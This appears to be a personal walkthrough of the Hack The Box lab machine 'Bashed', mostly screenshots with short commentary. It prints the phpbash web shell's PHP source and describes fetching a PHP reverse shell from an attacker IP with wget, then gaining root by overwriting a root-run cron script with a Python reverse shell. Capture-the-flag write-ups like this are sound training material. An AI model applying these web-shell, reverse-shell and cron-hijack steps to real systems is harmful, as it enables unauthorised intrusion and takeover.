Linux Boxes

bashed

  1. nmap
  2. phpbash github
    1. phpbash.php source code
  3. http
    1. gobuster
      1. dev/phpbash.min.php
        1. foothold calling back reverse shell with php.rev
  4. priv esc to scriptmanager
  5. priv esc to root
    1. Linux smart enumeration
      1. upload lse.sh
      2. lse report
    2. test.py cron job
    3. reverse shell
  6. user/root
  7. lessons learned

bashed

images/1-1.png
images/1-2.png

nmap

images/2-1.png
only service running is http

phpbash github

images/34-1.png

images/34-2.png

phpbash.php source code

<?php
/* phpbash by Alexander Reid (Arrexel) */
if (ISSET($_POST['cmd'])) {
    $output = preg_split('/[\n]/', shell_exec($_POST['cmd']." 2>&1"));
    foreach ($output as $line) {
        echo htmlentities($line, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "<br>";
    }
    die(); 
} else if (!empty($_FILES['file']['tmp_name']) && !empty($_POST['path'])) {
    $filename = $_FILES["file"]["name"];
    $path = $_POST['path'];
    if ($path !"/") {
        $path .= "/";
    } 
    if (move_uploaded_file($_FILES["file"]["tmp_name"], $path.$filename)) {
        echo htmlentities($filename) . " successfully uploaded to " . htmlentities($path);
    } else {
        echo "Error uploading " . htmlentities($filename);
    }
    die();
}
?>

http

images/2030-1.png
images/2030-2.png

gobuster

images/31-1.png

dev/phpbash.min.php

images/32-1.png


checking out phpbash.php, we see that the webserver spawns an interactive shell for us to play around with! however, it is slightly limited if we look back at the phpbash.php source code, so lets call a shell back to our attack machine so we can work with a fully functional shell
images/32-2.png

foothold calling back reverse shell with php.rev

since the server is coded in php, it makes sense to choose a reverse shell written in php, we can find one on pentestmonkey
images/33-1.png

next set these parameters in your rev.php file to call back to your ip and port
images/33-2.png
images/33-3.png

next serve up an http server on your attack machine and download it to your victim via wget
wget 10.10.14.62/rev.php
images/33-4.png
images/33-5.png


finally, navigate to your downloaded php script on bashed's /upload/ directory, set up a listener and voila!
images/33-6.png

we popped a shell and got a foothold on the box!
images/33-7.png

lets spawn an interactive shell with
python -c ‘import pty;pty.spawn("/bin/bash")’
images/33-8.png

priv esc to scriptmanager

running sudo -l to check what scripts we can run as root without a password we see:
images/35-1.png

we don't need a password for scriptmanager, let switch to his account

run sudo -u scriptmanager with bash spawn argument:
sudo -u scriptmanager /bin/bash
images/35-2.png

priv esc to root

notice scripts is owned by scriptmanager

images/36-1.png

Linux smart enumeration

its always good habit to run a privilege escalation script to catch anything that may otherwise be hard to spot,
a favorite of mine is lse.sh (linux smart enumeration) because its report is very easy to follow and comprehend

images/2032-1.png
images/2032-2.png

if you don't have it I highlt recommend downloading it to your /opt folder
images/2032-3.png

images/2032-4.png

images/2032-5.png

upload lse.sh

lets spin up an http server with python -m SimpleHTTPServer <port>

images/2033-1.png

and download it to our victim box with wget
images/2033-2.png

chmod -x lse.sh to make it executable and run it with bash or ./
images/2033-3.png


lse report

lets use -level 1 to output some interesting finds to document, skip passed the password prompt since we don't know scriptmanager's password

lse.sh -l 1

according to the report, there is a sessionclean script that runs every minute but we unfortunately cannot read what it does, lets keep it in mind and move on
images/2034-1.png

the report also indicates that the cron jobs are all run with root permissions, this indicates we can most likely exploit it to gain root privilieges if we can overwrite or hijack a script that the sessionclean cron job uses
images/2034-2.png


we see also from the report we can write to few files that may be worth looking into, lets check out the scripts folder
images/2034-3.png

test.py cron job

test.py has got to be a cron job that updates itself every minute, its also owned by root! This is our ticket in....

images/37-1.png
images/37-2.png

we notice that test.txt was updated a minutes ago!


lets see what test.py does
images/37-3.png

we see that test.txt is outputted
images/37-4.png

it has become overabundantely clear that since scriptmanager owns test.py and root runs test.py every MINUTE, we can easily hijack test.py to run a reverse shell in python to call back to our attack machine and simply wait a minute for root's cron job to execute it with root privileges back to us

reverse shell

Lets use pentest monkey's python script to connect back to our attacking machine every time it executes
images/38-1.png
simply tweak images/38-2.png to call back to your own ip and port of your choosing


images/38-3.png


Lets use wget to download our reverse shell and run it on our victim machine:
images/38-4.png

Lets also rename our rev_shell.py to test.py, hijacking test.py so it will be run every minute as root
images/38-5.png

when test.py executes on the minute we will spawn a shell as root and officially own the box!
images/38-6.png

user/root

images/40-1.png

images/40-2.png

lessons learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/

images/1954-1.png